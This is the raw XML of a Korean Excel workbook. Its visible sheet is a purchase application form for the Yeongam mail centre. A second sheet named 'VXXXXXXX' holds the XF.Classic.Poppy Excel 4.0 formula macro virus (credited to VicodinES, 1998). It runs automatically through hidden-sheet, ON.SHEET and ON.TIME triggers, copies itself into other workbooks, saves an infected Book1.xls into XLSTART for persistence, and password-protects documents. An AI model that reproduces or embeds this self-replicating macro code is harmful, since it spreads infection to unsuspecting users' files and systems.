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이석재\Desktop\김가영\반송불능우편물\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <x:bookViews>
    <x:workbookView xWindow="0" yWindow="0" windowWidth="23745" windowHeight="9120"/>
  </x:bookViews>
  <x:sheets>
    <x:sheet name="신청서" sheetId="1" r:id="rId4"/>
    <x:sheet name="VXXXXXXX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<x:sst xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:x="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="23" uniqueCount="23">
  <x:si>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보고2001하기피복.xls?down_num=986276279&amp;board=cug12_66&amp;command=down_load&amp;filename=보고2001하기피복.xls</x:t>
  </x:si>
  <x:si>
    <x:t>**Add New Workbook, Infect It, Save It As Book1.xls**</x:t>
  </x:si>
  <x:si>
    <x:t>C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1.</x:t>
  </x:si>
  <x:si>
    <x:t>Hydrocodone/APAP 10-650 For Your Computer</x:t>
  </x:si>
  <x:si>
    <x:t>An Excel Formula Macro Virus (XF.Classic)</x:t>
  </x:si>
  <x:si>
    <x:t>**Infect Workbook**</x:t>
  </x:si>
  <x:si>
    <x:t>**Simple Payload**</x:t>
  </x:si>
  <x:si>
    <x:t>**Auto and On Sheet Starts Here**</x:t>
  </x:si>
  <x:si>
    <x:t>단  가(원) :</x:t>
  </x:si>
  <x:si>
    <x:t>금  액(원) :</x:t>
  </x:si>
  <x:si>
    <x:t>영암우편집중국장 귀하</x:t>
  </x:si>
  <x:si>
    <x:t>수  량(개) :</x:t>
  </x:si>
  <x:si>
    <x:t>신청인 주소 :</x:t>
  </x:si>
  <x:si>
    <x:r>
      <x:t xml:space="preserve">품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  명 :</x:t>
    </x:r>
  </x:si>
  <x:si>
    <x:t>(C) The Narkotic Network 1998</x:t>
  </x:si>
  <x:si>
    <x:t>**Set Our Values and Paths**</x:t>
  </x:si>
  <x:si>
    <x:t>Classic.Poppy by VicodinES</x:t>
  </x:si>
  <x:si>
    <x:t xml:space="preserve">  상기와 같이 물품을 구입하고자 신청합니다.</x:t>
  </x:si>
  <x:si>
    <x:t>Sheet1</x:t>
  </x:si>
  <x:si>
    <x:r>
      <x:t xml:space="preserve">생 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5"/>
            <x:color rgb="ff000000"/>
          </x:rPr>
        </mc:Fallback>
      </mc:AlternateContent>
      <x:t xml:space="preserve"> 월 일 :</x:t>
    </x:r>
  </x:si>
  <x:si>
    <x:t>신     청     서</x:t>
  </x:si>
  <x:si>
    <x:t>With Lord Natas</x:t>
  </x:si>
  <x:si>
    <x:t>성         명 :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</x:si>
</x:sst>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돋움"/>
      <x:sz val="10"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="Arial"/>
      <x:sz val="10"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="Arial"/>
      <x:sz val="10"/>
      <x:color rgb="ffff0000"/>
      <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="Arial"/>
      <x:sz val="10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000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0" fillId="0" borderId="0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38" fontId="0" fillId="0" borderId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
          <x:alignment horizontal="general" vertical="bottom"/>
        </x:xf>
      </mc:Fallback>
    </mc:AlternateContent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0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0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2" borderId="0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1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3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8" fillId="6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4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5" xfId="2" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1" hs:applyExtension="1">
          <x:alignment horizontal="center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7" fillId="5" borderId="5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6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4" borderId="7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8" xfId="2" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1" hs:applyExtension="1">
          <x:alignment horizontal="general" vertical="bottom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6" fillId="3" borderId="8" xfId="2" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
          <x:alignment horizontal="general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0" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1" hs:applyExtension="1">
          <x:alignment horizontal="general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1" fillId="7" borderId="0" xfId="1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150" hs:breakNonLatinWord="breakWord" hs:breakLatinWord="keepWord" hs:condense="0" hs:textAlignment="baseLine"/>
        </x:xf>
      </mc:Choice>
      <mc:Fallback>
        <x:xf numFmtId="0" fontId="12" fillId="7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백분율" xfId="1" builtinId="5"/>
    <x:cellStyle name="40% - 강조색1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1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77734375" defaultRowHeight="13.199999999999999"/>
  <x:cols>
    <x:col min="1" max="8" width="12.66796875" style="14" customWidth="1"/>
    <x:col min="9" max="16383" width="9.33203125" style="14" customWidth="1"/>
    <x:col min="16384" max="16384" width="8.77734375" style="14"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A1" s="16"/>
      <x:c r="B1" s="16"/>
      <x:c r="C1" s="16"/>
      <x:c r="D1" s="16"/>
      <x:c r="E1" s="16"/>
      <x:c r="F1" s="16"/>
      <x:c r="G1" s="16"/>
      <x:c r="H1" s="16"/>
    </x:row>
    <x:row r="2" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A2" s="17" t="s">
        <x:v>20</x:v>
      </x:c>
      <x:c r="B2" s="17"/>
      <x:c r="C2" s="17"/>
      <x:c r="D2" s="17"/>
      <x:c r="E2" s="17"/>
      <x:c r="F2" s="17"/>
      <x:c r="G2" s="17"/>
      <x:c r="H2" s="17"/>
    </x:row>
    <x:row r="3" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A3" s="16"/>
      <x:c r="B3" s="16"/>
      <x:c r="C3" s="16"/>
      <x:c r="D3" s="16"/>
      <x:c r="E3" s="16"/>
      <x:c r="F3" s="16"/>
      <x:c r="G3" s="16"/>
      <x:c r="H3" s="16"/>
    </x:row>
    <x:row r="4" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A4" s="16"/>
      <x:c r="B4" s="16"/>
      <x:c r="C4" s="16"/>
      <x:c r="D4" s="16"/>
      <x:c r="E4" s="16"/>
      <x:c r="F4" s="16"/>
      <x:c r="G4" s="16"/>
      <x:c r="H4" s="16"/>
    </x:row>
    <x:row r="5" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A5" s="16" t="s">
        <x:v>13</x:v>
      </x:c>
      <x:c r="B5" s="16"/>
      <x:c r="C5" s="16"/>
      <x:c r="D5" s="16"/>
      <x:c r="E5" s="16"/>
      <x:c r="F5" s="16"/>
      <x:c r="G5" s="16"/>
      <x:c r="H5" s="16"/>
    </x:row>
    <x:row r="6" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A6" s="16" t="s">
        <x:v>11</x:v>
      </x:c>
      <x:c r="B6" s="16"/>
      <x:c r="C6" s="16"/>
      <x:c r="D6" s="16"/>
      <x:c r="E6" s="16"/>
      <x:c r="F6" s="16"/>
      <x:c r="G6" s="16"/>
      <x:c r="H6" s="16"/>
    </x:row>
    <x:row r="7" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A7" s="16" t="s">
        <x:v>8</x:v>
      </x:c>
      <x:c r="B7" s="16"/>
      <x:c r="C7" s="16"/>
      <x:c r="D7" s="16"/>
      <x:c r="E7" s="16"/>
      <x:c r="F7" s="16"/>
      <x:c r="G7" s="16"/>
      <x:c r="H7" s="16"/>
    </x:row>
    <x:row r="8" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A8" s="16" t="s">
        <x:v>9</x:v>
      </x:c>
      <x:c r="B8" s="16"/>
      <x:c r="C8" s="16"/>
      <x:c r="D8" s="16"/>
      <x:c r="E8" s="16"/>
      <x:c r="F8" s="16"/>
      <x:c r="G8" s="16"/>
      <x:c r="H8" s="16"/>
    </x:row>
    <x:row r="9" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A9" s="16"/>
      <x:c r="B9" s="16"/>
      <x:c r="C9" s="16"/>
      <x:c r="D9" s="16"/>
      <x:c r="E9" s="16"/>
      <x:c r="F9" s="16"/>
      <x:c r="G9" s="16"/>
      <x:c r="H9" s="16"/>
    </x:row>
    <x:row r="10" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A10" s="16"/>
      <x:c r="B10" s="16"/>
      <x:c r="C10" s="16"/>
      <x:c r="D10" s="16"/>
      <x:c r="E10" s="16"/>
      <x:c r="F10" s="16"/>
      <x:c r="G10" s="16"/>
      <x:c r="H10" s="16"/>
    </x:row>
    <x:row r="11" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A11" s="16" t="s">
        <x:v>17</x:v>
      </x:c>
      <x:c r="B11" s="16"/>
      <x:c r="C11" s="16"/>
      <x:c r="D11" s="16"/>
      <x:c r="E11" s="16"/>
      <x:c r="F11" s="16"/>
      <x:c r="G11" s="16"/>
      <x:c r="H11" s="16"/>
    </x:row>
    <x:row r="12" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A12" s="16"/>
      <x:c r="B12" s="16"/>
      <x:c r="C12" s="16"/>
      <x:c r="D12" s="16"/>
      <x:c r="E12" s="16"/>
      <x:c r="F12" s="16"/>
      <x:c r="G12" s="16"/>
      <x:c r="H12" s="16"/>
    </x:row>
    <x:row r="13" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A13" s="16"/>
      <x:c r="B13" s="16"/>
      <x:c r="C13" s="16"/>
      <x:c r="D13" s="16"/>
      <x:c r="E13" s="16"/>
      <x:c r="F13" s="16"/>
      <x:c r="G13" s="16"/>
      <x:c r="H13" s="16"/>
    </x:row>
    <x:row r="14" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A14" s="16"/>
      <x:c r="B14" s="16"/>
      <x:c r="C14" s="16"/>
      <x:c r="D14" s="16"/>
      <x:c r="E14" s="16"/>
      <x:c r="F14" s="16"/>
      <x:c r="G14" s="16"/>
      <x:c r="H14" s="16"/>
    </x:row>
    <x:row r="15" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A15" s="16" t="s">
        <x:v>12</x:v>
      </x:c>
      <x:c r="B15" s="16"/>
      <x:c r="C15" s="16"/>
      <x:c r="D15" s="16"/>
      <x:c r="E15" s="16"/>
      <x:c r="F15" s="16"/>
      <x:c r="G15" s="16"/>
      <x:c r="H15" s="16"/>
    </x:row>
    <x:row r="16" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A16" s="16" t="s">
        <x:v>19</x:v>
      </x:c>
      <x:c r="B16" s="16"/>
      <x:c r="C16" s="16"/>
      <x:c r="D16" s="16"/>
      <x:c r="E16" s="16"/>
      <x:c r="F16" s="16"/>
      <x:c r="G16" s="16"/>
      <x:c r="H16" s="16"/>
    </x:row>
    <x:row r="17" spans="1:8" s="15" customFormat="1" ht="31.5" customHeight="1">
      <x:c r="A17" s="16" t="s">
        <x:v>22</x:v>
      </x:c>
      <x:c r="B17" s="16"/>
      <x:c r="C17" s="16"/>
      <x:c r="D17" s="16"/>
      <x:c r="E17" s="16"/>
      <x:c r="F17" s="16"/>
      <x:c r="G17" s="16"/>
      <x:c r="H17" s="16"/>
    </x:row>
    <x:row r="18" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A18" s="16"/>
      <x:c r="B18" s="16"/>
      <x:c r="C18" s="16"/>
      <x:c r="D18" s="16"/>
      <x:c r="E18" s="16"/>
      <x:c r="F18" s="16"/>
      <x:c r="G18" s="16"/>
      <x:c r="H18" s="16"/>
    </x:row>
    <x:row r="19" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A19" s="16"/>
      <x:c r="B19" s="16"/>
      <x:c r="C19" s="16"/>
      <x:c r="D19" s="16"/>
      <x:c r="E19" s="16"/>
      <x:c r="F19" s="16"/>
      <x:c r="G19" s="16"/>
      <x:c r="H19" s="16"/>
    </x:row>
    <x:row r="20" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A20" s="16"/>
      <x:c r="B20" s="16"/>
      <x:c r="C20" s="16"/>
      <x:c r="D20" s="16"/>
      <x:c r="E20" s="16"/>
      <x:c r="F20" s="16"/>
      <x:c r="G20" s="16"/>
      <x:c r="H20" s="16"/>
    </x:row>
    <x:row r="21" spans="1:8" ht="31.5" customHeight="1">
      <x:c r="A21" s="17" t="s">
        <x:v>10</x:v>
      </x:c>
      <x:c r="B21" s="17"/>
      <x:c r="C21" s="17"/>
      <x:c r="D21" s="17"/>
      <x:c r="E21" s="17"/>
      <x:c r="F21" s="17"/>
      <x:c r="G21" s="17"/>
      <x:c r="H21" s="17"/>
    </x:row>
    <x:row r="22" ht="24.949999999999999" customHeight="1"/>
    <x:row r="23" ht="12" customHeight="1"/>
    <x:row r="24" ht="12" customHeight="1"/>
    <x:row r="25" ht="12" customHeight="1"/>
    <x:row r="26" ht="12" customHeight="1"/>
    <x:row r="27" ht="12" customHeight="1"/>
    <x:row r="28" ht="12" customHeight="1"/>
    <x:row r="29" ht="12" customHeight="1"/>
    <x:row r="30" ht="12" customHeight="1"/>
    <x:row r="31" ht="12" customHeight="1"/>
    <x:row r="32" ht="12" customHeight="1"/>
    <x:row r="33" ht="12" customHeight="1"/>
    <x:row r="34" ht="12" customHeight="1"/>
    <x:row r="35" ht="12" customHeight="1"/>
    <x:row r="36" ht="12" customHeight="1"/>
    <x:row r="37" ht="12" customHeight="1"/>
    <x:row r="38" ht="12" customHeight="1"/>
    <x:row r="39" ht="12" customHeight="1"/>
    <x:row r="40" ht="12" customHeight="1"/>
    <x:row r="41" ht="12" customHeight="1"/>
    <x:row r="42" ht="12" customHeight="1"/>
    <x:row r="43" ht="12" customHeight="1"/>
    <x:row r="44" ht="12" customHeight="1"/>
    <x:row r="45" ht="12" customHeight="1"/>
  </x:sheetData>
  <x:mergeCells count="2">
    <x:mergeCell ref="A2:H2"/>
    <x:mergeCell ref="A21:H21"/>
  </x:mergeCells>
  <x:pageMargins left="0.75" right="0.75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C41"/>
  <x:sheetViews>
    <x:sheetView topLeftCell="A1" zoomScaleNormal="100" zoomScaleSheetLayoutView="75" workbookViewId="0">
      <x:selection activeCell="C1" activeCellId="0" sqref="C1:C1"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultColWidth="10.6640625" defaultRowHeight="12.9"/>
  <x:cols>
    <x:col min="1" max="1" width="34.83203125" style="2" customWidth="1"/>
    <x:col min="2" max="2" width="1.5" style="2" customWidth="1"/>
    <x:col min="3" max="3" width="37.5" style="2" customWidth="1"/>
    <x:col min="4" max="16384" width="10.6640625" style="2" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A1" s="1" t="s">
        <x:v>18</x:v>
      </x:c>
      <x:c r="C1" s="2" t="e">
        <x:f>WORKBOOK.HIDE("XL4Poppy")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="2" spans="1:1" ht="13.5" customHeight="1">
      <x:c r="A2" s="1" t="s">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="3" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A3" s="3" t="s">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C3" s="4" t="s">
        <x:v>7</x:v>
      </x:c>
    </x:row>
    <x:row r="4" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A4" s="3" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C4" s="5" t="e">
        <x:f>RUN(C18)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="5" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C5" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="6" spans="3:3" ht="13.5" customHeight="1">
      <x:c r="C6" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="7" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A7" s="6" t="s">
        <x:v>16</x:v>
      </x:c>
      <x:c r="C7" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="8" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A8" s="7" t="s">
        <x:v>21</x:v>
      </x:c>
      <x:c r="C8" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="9" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A9" s="8" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C9" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="10" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A10" s="7" t="s">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C10" s="5" t="e">
        <x:f>RUN(A21)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="11" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A11" s="9" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="C11" s="5" t="e">
        <x:f>ON.TIME("6:30:00 PM","Hello")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="12" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C12" s="5" t="e">
        <x:f>ON.TIME("6:30:00 AM","Morning")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="13" spans="3:3" ht="13.5" customHeight="1">
      <x:c r="C13" s="5" t="e">
        <x:f>ON.SHEET(,"Poppy",TRUE)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="14" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A14" s="4" t="s">
        <x:v>6</x:v>
      </x:c>
      <x:c r="C14" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="15" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A15" s="5" t="e">
        <x:f>ALERT("XF.Classic.Poppy by VicodinES",2)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="16" spans="1:1" ht="13.5" customHeight="1">
      <x:c r="A16" s="5" t="e">
        <x:f>ALERT("ⓒ 1998 The Narkotic Network",2)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="17" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A17" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C17" s="4" t="s">
        <x:v>15</x:v>
      </x:c>
    </x:row>
    <x:row r="18" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C18" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="19" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C19" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="20" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A20" s="11" t="s">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C20" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="21" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A21" s="12" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C21" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="22" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A22" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C22" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="23" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A23" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C23" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="24" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A24" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="25" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A25" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="26" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A26" s="5" t="e">
        <x:f>NEW(1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C26" s="13" t="s">
        <x:v>5</x:v>
      </x:c>
    </x:row>
    <x:row r="27" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A27" s="5" t="e">
        <x:f>WORKBOOK.INSERT(1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C27" s="5" t="e">
        <x:f>RUN(C19)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="28" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A28" s="5" t="e">
        <x:f>WORKBOOK.INSERT(1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C28" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="29" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A29" s="5" t="e">
        <x:f>ACTIVATE.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C29" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="30" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A30" s="5" t="e">
        <x:f>RUN(C18)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C30" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="31" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A31" s="5" t="e">
        <x:f>WORKBOOK.COPY("XL4Poppy",A1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C31" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="32" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A32" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet3","Sheet99")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C32" s="5" t="e">
        <x:f>ACTIVATE.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="33" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A33" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet1","Sheet3")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C33" s="5" t="e">
        <x:f>RUN(C19)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="34" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A34" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet99","Sheet1")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C34" s="5" t="e">
        <x:f>WORKBOOK.COPY("XL4Poppy",A1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="35" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A35" s="5" t="e">
        <x:f>PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C35" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="36" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A36" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C36" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="37" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A37" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="38" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A38" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="39" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A39" s="5" t="e">
        <x:f>SAVE.AS(A3)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C39" s="12" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="40" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A40" s="5" t="e">
        <x:f>FILE.CLOSE()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C40" s="5" t="e">
        <x:f>MESSAGE(TRUE,"VicodinES and Lord Natas greet you a good morning!")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="41" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A41" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C41" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
  </x:sheetData>
  <x:sheetProtection password="8863" sheet="1" objects="0" scenarios="0" formatCells="1" formatColumns="1" formatRows="1" insertColumns="1" insertRows="1" insertHyperlinks="1" deleteColumns="1" deleteRows="1" selectLockedCells="0" sort="1" autoFilter="1" pivotTables="1" selectUnlockedCells="0"/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신청서</vt:lpstr>
      <vt:lpstr>VXXXXXXX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관리과02</dc:creator>
  <cp:lastModifiedBy>박진홍</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <cp:lastPrinted>2022-06-27T02:41:54.962</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-04-03T05:55:52.000</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-27T06:47:45.979</dcterms:modified>
  <cp:version>1100.0100.01</cp:version>
</cp:coreProperties>
</file>